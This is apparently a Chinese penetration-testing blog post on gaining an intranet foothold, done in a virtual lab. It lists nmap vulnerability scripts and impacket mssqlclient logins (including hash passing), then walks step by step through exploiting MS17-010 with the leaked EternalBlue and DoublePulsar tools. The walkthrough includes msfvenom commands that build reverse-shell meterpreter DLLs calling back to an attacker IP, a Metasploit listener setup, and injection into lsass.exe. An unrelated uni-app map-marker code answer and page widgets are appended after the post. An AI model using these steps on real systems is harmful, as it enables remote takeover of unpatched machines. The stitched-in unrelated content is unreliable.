打点-进入内网(一)


常见漏洞扫描

1.Nmap扫描技巧

  • auth 处理身份验证
  • broadcast 网络广播
  • brute 暴力猜解
  • default 默认
  • discovery 服务发现
  • dos 拒绝服务
  • exploit 漏洞利用
  • external 外部扩展
  • fuzzer 模糊测试
  • intrusive 扫描可能造成不良后果
  • malware 检测后门
  • safe 扫描危害较小
  • version 版本识别
  • vuln漏洞检测

通用参数- vuln

nmap --script=vuln 192.168.70.147

在这里插入图片描述
MS17-010

nmap --script=smb-vuln-ms17-010 192.168.70.147

在这里插入图片描述

2.impacket框架之mssql服务器安全检测

    在实际渗透测试工作中经常会遇到检测项目中mssql服务器安全性
impacket框架:https://github.com/SecureAuthCorp/impacket

mssglclient与其他工具相比的优势

  • 跨平台,python脚本编写,并且已有exe版本
  • 命令行执行,速度快
  • 支持使用socks代理传输数据
  • 支持以hash传递的方式进行账号验证
  • 支持Windows认证模式进行mssql服务的安全检测
  • 执行sql命令可以是交互式,也可以直接回显sql命令执行结果

Mssqlclient的基本使用命令为

验证以Windows认证模式的mssql服务

python mssqlclient.py domain/username:password@ip -windows-auth

验证以mssql账号密码认证的mssql服务

python mssqlclient.py ./username:password@ip

验证以mssql账号密码认证的mssql服务,并执行command.txt内的sql命令

python mssqlclient.py ./username:password@ip -file command . txt

Impacket网络协议工具包安装

Kali Linux安装Impacket

我们通过git clone命令克隆存储库

git clone https://github.com/SecureAuthCorp/impacket  
cd impacket/
python setup.py install

在这里插入图片描述

查看工具

cd impacket/examples
ls

在这里插入图片描述

Windows安装Impacket

在这个github上直接下载即可
https://github.com/maaaaz/impacket-examples-windows

在这里插入图片描述

3.MS17_010 py脚本利用

前言
为什么要介绍用py脚本?因为有些机器存在漏洞,但是使用MSF的模块利用失败,而使用py脚本则能成功利用。

利用

在本地用虚拟机搭建了Kali和windows7系统
192.168.70.147 虚拟机XP(需安装Python2.6.6和pywin32安装包 )
192.168.70.11 虚拟机Kali IP
192.168.70.130 虚拟机windows7 IP
即:192.168.70.147 是操作机 192.168.70.130是靶机

在kali中用metasploit生成64位的dll

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.70.11 LPORT=8089 -f dll >reverser_tcp_64.dll
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.70.11 LPORT=8089 -f dll >reverser_tcp_64.dll

192.168.70.11 是Kali的IP, LPORT可以随意设置。但是之后的LPORT必须与此时设置的端口要一致!

生成了dll
在这里插入图片描述

msfconsole   //进入控制台
use exploit/multi/handler //使用监听模块
set payload windows/x64/meterpreter/reverse_tcp //设置payload
show options //查看配置信息
set LHOST 192.168.70.11 //设置本地IP
set LPORT 8089 //设置本地端口
run //运行

在这里插入图片描述

下载shadowbroker:https://github.com/root-tools/shadowbroker
进入shadowbroker文件夹下的windows文件夹内先创建一个listeningposts的空文件夹打开fb.py,否则会报错
在这里插入图片描述

在这里插入图片描述
设置全局参数
Default Target IP Address(默认靶机IP): 192.168.70.130
Default Callback IP Address(默认监控主机IP): 192.168.70.11
Use Redirection(使用重定向): no
Set LogDir(设置日志路径): c:\logs
Project(0是创建一个新的项目):0
New Project Name(项目名称):Test_Win7
在这里插入图片描述
use Eternalblue使用Eternalblue插件
使用EternalBlue攻击靶机,这里需要注意的是,事先要确定靶机的操作系统,这个类型要做选择。

use Eternalblue

在这里插入图片描述
一路回车
在这里插入图片描述
这里根据目标的系统选择0或1,因为靶机是win7,所以选1
在这里插入图片描述
这里要选择攻击方式,选择FB,即1
在这里插入图片描述
成功调用插件
在这里插入图片描述
接下来使用doublepulsar插件
与EternalBlue一样,需要选择靶机系统类型。
ProcessName [lsass.exe]者一项是默认,否则无法运行后门。

use doublepulsar

在这里插入图片描述
一路回车
在这里插入图片描述
这里选择smb方式
在这里插入图片描述
这里选择x64
在这里插入图片描述
这里选择dll
在这里插入图片描述
这里写dll文件的路径
在这里插入图片描述

在这里插入图片描述

一路回车
在这里插入图片描述
在这里插入图片描述

成功
在这里插入图片描述
在这里插入图片描述

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
在uni-app中实现地图打点功能,你可以使用uni-app的原生API结合第三方地图插件来实现。以下是一种常见的实现方法: 1. 首先,在uni-app项目中安装并引入第三方地图插件,例如腾讯地图或百度地图。你可以通过uni-app插件市场或者npm进行安装。 2. 在需要使用地图的页面中,引入地图组件,并在data中定义相关变量,如下所示: ```vue <template> <view> <map :longitude="longitude" :latitude="latitude" :markers="markers"></map> </view> </template> <script> export default { data() { return { longitude: 0, // 经度 latitude: 0, // 纬度 markers: [], // 打点信息 }; }, }; </script> ``` 3. 在页面的`onLoad`生命周期钩子中获取用户当前位置的经纬度,并将其赋值给`longitude`和`latitude`变量: ```javascript onLoad() { uni.getLocation({ type: 'gcj02', success: (res) => { this.longitude = res.longitude; this.latitude = res.latitude; }, }); }, ``` 4. 在需要进行打点的位置,通过调用第三方地图插件的相关API来添加打点,例如: ```javascript addMarker() { const marker = { id: '1', latitude: 39.908823, longitude: 116.397470, title: 'Marker1', iconPath: 'path/to/icon.png', width: 20, height: 20, }; this.markers.push(marker); }, ``` 5. 最后,在页面中调用`addMarker`方法来添加打点,即可在地图上显示打点信息。 这是一个简单的示例,你可以根据自己的需求进行扩展和优化。记得根据使用的地图插件的文档来使用相应的API。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值